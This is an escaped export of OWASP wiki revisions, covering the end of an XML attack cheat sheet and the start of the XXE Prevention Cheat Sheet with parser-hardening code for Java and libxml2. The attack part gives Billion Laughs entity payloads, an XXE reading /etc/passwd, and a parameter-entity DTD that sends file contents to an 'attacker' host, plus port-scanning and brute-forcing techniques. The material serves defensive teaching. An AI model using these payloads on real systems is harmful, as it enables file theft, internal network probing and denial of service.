  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=224924</id>
		<title>XML External Entity (XXE) Prevention Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_External_Entity_(XXE)_Prevention_Cheat_Sheet&amp;diff=224924"/>
				<updated>2017-01-11T20:26:02Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: DOM4J has also the same type of protections than DOM and SAX&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
An &amp;lt;i&amp;gt;XML External Entity&amp;lt;/i&amp;gt; attack is a type of attack against an application that parses XML input. This attack occurs when &amp;lt;b&amp;gt;XML input containing a reference to an external entity is processed by a weakly configured XML parser&amp;lt;/b&amp;gt;. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability. For more information on XXE, please visit [[XML External Entity (XXE) Processing]].&lt;br /&gt;
&lt;br /&gt;
==General Guidance==&lt;br /&gt;
The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;factory.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&amp;lt;/nowiki&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Disabling DTDs also makes the parser secure against denial of services (DOS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external doctypes must be disabled in the way that’s specific to each parser.&lt;br /&gt;
&lt;br /&gt;
Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.&lt;br /&gt;
&lt;br /&gt;
==C/C++==&lt;br /&gt;
&lt;br /&gt;
===libxml2===&lt;br /&gt;
&lt;br /&gt;
The Enum [http://xmlsoft.org/html/libxml-parser.html#xmlParserOption xmlParserOption] should not have the following options defined:&lt;br /&gt;
&lt;br /&gt;
* XML_PARSE_NOENT: Expands entities and substitutes them with replacement text&lt;br /&gt;
* XML_PARSE_DTDLOAD: Load the external DTD&lt;br /&gt;
&lt;br /&gt;
Note: Per: https://mail.gnome.org/archives/xml/2012-October/msg00045.html, starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following patch: http://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f.&lt;br /&gt;
&lt;br /&gt;
==Java==&lt;br /&gt;
&lt;br /&gt;
Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.&lt;br /&gt;
&lt;br /&gt;
===JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J===&lt;br /&gt;
&lt;br /&gt;
DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE. Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory [http://docs.oracle.com/javase/7/docs/api/javax/xml/parsers/DocumentBuilderFactory.html#setFeature(java.lang.String,%20boolean) setFeature] method allows a developer to control which implementation-specific XML processor features are enabled or disabled. The features can either be set on the factory or the underlying XMLReader [http://docs.oracle.com/javase/7/docs/api/org/xml/sax/XMLReader.html#setFeature%28java.lang.String,%20boolean%29 setFeature] method. Each XML processor implementation has its own features that govern how DTDs and external entities are processed.&lt;br /&gt;
&lt;br /&gt;
For a syntax highlighted code snippet for DocumentBuilderFactory, click [https://gist.github.com/Prandium/dee14ea650ff7900f2c0 here].&lt;br /&gt;
&lt;br /&gt;
For a syntax highlighted code snippet for SAXParserFactory, click [https://gist.github.com/asudhakar02/45e2e6fd8bcdfb4bc3b2 here].&lt;br /&gt;
&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
import javax.xml.parsers.ParserConfigurationException; // catching unsupported features&lt;br /&gt;
...&lt;br /&gt;
 &lt;br /&gt;
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    String FEATURE = null;&lt;br /&gt;
    try {&lt;br /&gt;
      // This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all XML entity attacks are prevented&lt;br /&gt;
      // Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl&lt;br /&gt;
      FEATURE = &amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, true);&lt;br /&gt;
&lt;br /&gt;
      // If you can't completely disable DTDs, then at least do the following:&lt;br /&gt;
      // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities&lt;br /&gt;
      // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities&lt;br /&gt;
      // JDK7+ - http://xml.org/sax/features/external-general-entities    &lt;br /&gt;
      FEATURE = &amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities&lt;br /&gt;
      // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities&lt;br /&gt;
      // JDK7+ - http://xml.org/sax/features/external-parameter-entities    &lt;br /&gt;
      FEATURE = &amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // Disable external DTDs as well&lt;br /&gt;
      FEATURE = &amp;quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&amp;quot;;&lt;br /&gt;
      dbf.setFeature(FEATURE, false);&lt;br /&gt;
&lt;br /&gt;
      // and these as well, per Timothy Morgan's 2014 paper: &amp;quot;XML Schema, DTD, and Entity Attacks&amp;quot; (see reference below)&lt;br /&gt;
      dbf.setXIncludeAware(false);&lt;br /&gt;
      dbf.setExpandEntityReferences(false);&lt;br /&gt;
 &lt;br /&gt;
      // And, per Timothy Morgan: &amp;quot;If for some reason support for inline DOCTYPEs are a requirement, then &lt;br /&gt;
      // ensure the entity settings are disabled (as shown above) and beware that SSRF attacks&lt;br /&gt;
      // (http://cwe.mitre.org/data/definitions/918.html) and denial &lt;br /&gt;
      // of service attacks (such as billion laughs or decompression bombs via &amp;quot;jar:&amp;quot;) are a risk.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
      // remaining parser logic&lt;br /&gt;
      ...&lt;br /&gt;
 &lt;br /&gt;
      } catch (ParserConfigurationException e) {&lt;br /&gt;
            // This should catch a failed setFeature feature&lt;br /&gt;
            logger.info(&amp;quot;ParserConfigurationException was thrown. The feature '&amp;quot; +&lt;br /&gt;
                        FEATURE +&lt;br /&gt;
                        &amp;quot;' is probably not supported by your XML processor.&amp;quot;);&lt;br /&gt;
            ...&lt;br /&gt;
        }&lt;br /&gt;
        catch (SAXException e) {&lt;br /&gt;
            // On Apache, this should be thrown when disallowing DOCTYPE&lt;br /&gt;
            logger.warning(&amp;quot;A DOCTYPE was passed into the XML document&amp;quot;);&lt;br /&gt;
            ...&lt;br /&gt;
        }&lt;br /&gt;
        catch (IOException e) {&lt;br /&gt;
            // XXE that points to a file that doesn't exist&lt;br /&gt;
            logger.error(&amp;quot;IOException occurred, XXE may still possible: &amp;quot; + e.getMessage());&lt;br /&gt;
            ...&lt;br /&gt;
        }&amp;lt;/nowiki&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
[http://xerces.apache.org/xerces-j/ Xerces 1] [http://xerces.apache.org/xerces-j/features.html Features]:&lt;br /&gt;
* Do not include external entities by setting [http://xerces.apache.org/xerces-j/features.html#external-general-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include parameter entities by setting [http://xerces.apache.org/xerces-j/features.html#external-parameter-entities this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external DTDs by setting [http://xerces.apache.org/xerces-j/features.html#load-external-dtd this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
[http://xerces.apache.org/xerces2-j/ Xerces 2] [http://xerces.apache.org/xerces2-j/features.html Features]:&lt;br /&gt;
* Disallow an inline DTD by setting [http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl this feature] to &amp;lt;code&amp;gt;true&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external entities by setting [http://xerces.apache.org/xerces2-j/features.html#external-general-entities  this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include parameter entities by setting [http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities  this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Do not include external DTDs by setting [http://xerces.apache.org/xerces-j/features.html#load-external-dtd this feature] to &amp;lt;code&amp;gt;false&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
'''Note: Please use Java 7 update 67, Java 8 update 20 or above, otherwise the above countermeasures for DocumentBuilderFactory and SAXParserFactory do not work . For details, please refer to CVE-2014-6517[http://www.cvedetails.com/cve/CVE-2014-6517/].'''&lt;br /&gt;
&lt;br /&gt;
===StAX and XMLInputFactory===&lt;br /&gt;
&lt;br /&gt;
[http://en.wikipedia.org/wiki/StAX StAX] parsers such as [http://docs.oracle.com/javase/7/docs/api/javax/xml/stream/XMLInputFactory.html XMLInputFactory] allow various properties and features to be set.&lt;br /&gt;
&lt;br /&gt;
To protect a Java XMLInputFactory from XXE, do this:&lt;br /&gt;
&lt;br /&gt;
* xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); // This disables DTDs entirely for that factory&lt;br /&gt;
* xmlInputFactory.setProperty(“javax.xml.stream.isSupportingExternalEntities”, false); // disable external entities&lt;br /&gt;
&lt;br /&gt;
===TransformerFactory===&lt;br /&gt;
To protect a Java TransformerFactory from XXE, do this:&lt;br /&gt;
* TransformerFactory tf = TransformerFactory.newInstance();&lt;br /&gt;
* tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, &amp;quot;&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
===Validator===&lt;br /&gt;
To protect a Java Validator from XXE, do this:&lt;br /&gt;
* SchemaFactory factory = SchemaFactory.newInstance(&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;);&lt;br /&gt;
* Schema schema = factory.newSchema();&lt;br /&gt;
* Validator validator = schema.newValidator();&lt;br /&gt;
* validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
===SchemaFactory===&lt;br /&gt;
To protect a SchemaFactory from XXE, do this:&lt;br /&gt;
* SchemaFactory factory = SchemaFactory.newInstance(&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;);&lt;br /&gt;
* factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;);&lt;br /&gt;
* Schema schema = factory.newSchema(Source);&lt;br /&gt;
&lt;br /&gt;
===SAXTransformerFactory===&lt;br /&gt;
To protect a Java SAXTransformerFactory from XXE, do this:&lt;br /&gt;
* SAXTransformerFactory sf = SAXTransformerFactory.newInstance();		&lt;br /&gt;
* sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, &amp;quot;&amp;quot;);&lt;br /&gt;
* sf.newXMLFilter(Source);&lt;br /&gt;
&lt;br /&gt;
===XMLReader===&lt;br /&gt;
To protect a Java XMLReader from XXE, do this:&lt;br /&gt;
* XMLReader spf = XMLReaderFactory.createXMLReader();&lt;br /&gt;
* spf.setFeature(“http://xml.org/sax/features/external-general-entities”, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(“http://apache.org/xml/features/nonvalidating/load-external-dtd”,false);&lt;br /&gt;
&lt;br /&gt;
===saxReader===&lt;br /&gt;
To protect a Java saxReader from XXE, do this:&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;, false);&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
PS. Based on testing, missing one of this can still be vulnerable to XXE attack.&lt;br /&gt;
===Unmarshaller===&lt;br /&gt;
Since an Unmarshaller parses XML and does not support any flags for disabling XXE, it’s imperative to parse the untrusted XML through a configurable secure parser first, generate a Source object as a result, and pass the source object to the Unmarshaller. For example:&lt;br /&gt;
* SAXParserFactory spf = SAXParserFactory.newInstance();&lt;br /&gt;
* spf.setFeature(“http://xml.org/sax/features/external-general-entities”, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&amp;quot;, false);&lt;br /&gt;
&lt;br /&gt;
* Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(new StringReader(xml)));&lt;br /&gt;
* JAXBContext jc = JAXBContext.newInstance(Object.class);&lt;br /&gt;
* Unmarshaller um = jc.createUnmarshaller();&lt;br /&gt;
* um.unmarshal(xmlSource);&lt;br /&gt;
&lt;br /&gt;
===XPathExpression===&lt;br /&gt;
An XPathExpression is similar to an Unmarshaller where it can’t be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first. For example:&lt;br /&gt;
* DocumentBuilderFactory df =DocumentBuilderFactory.newInstance();			&lt;br /&gt;
* df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;); &lt;br /&gt;
* df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;); 	&lt;br /&gt;
* builder = df.newDocumentBuilder();&lt;br /&gt;
* xPathExpression.evaluate( builder.parse(new ByteArrayInputStream(xml.getBytes())) );&lt;br /&gt;
&lt;br /&gt;
===java.beans.XMLDecoder===&lt;br /&gt;
&lt;br /&gt;
The [https://docs.oracle.com/javase/8/docs/api/java/beans/XMLDecoder.html#readObject-- readObject()] method in this class is fundamentally unsafe. Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and [http://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files execute arbitrary code as described here]. And there is no way to make use of this class safe except to trust or properly validate the input being passed into it. As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.&lt;br /&gt;
&lt;br /&gt;
===Other XML Parsers===&lt;br /&gt;
There are many 3rd party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions like the examples given above. If there’s no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to insecure 3rd party parser similar to how the Unmarshaller is secured.&lt;br /&gt;
&lt;br /&gt;
==== Spring Framework MVC/OXM XXE Vulnerabilities ====&lt;br /&gt;
&lt;br /&gt;
For example, some XXE vulnerabilities was found in [http://pivotal.io/security/cve-2013-4152 Spring OXM] and [http://pivotal.io/security/cve-2013-7315 Spring MVC]. The following versions of the Spring Framework are vulnerable to XXE:&lt;br /&gt;
&lt;br /&gt;
* 3.0.0 to 3.2.3 (Spring OXM &amp;amp; Spring MVC)&lt;br /&gt;
* 4.0.0.M1 (Spring OXM)&lt;br /&gt;
* 4.0.0.M1-4.0.0.M2 (Spring MVC)&lt;br /&gt;
&lt;br /&gt;
There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.&lt;br /&gt;
&lt;br /&gt;
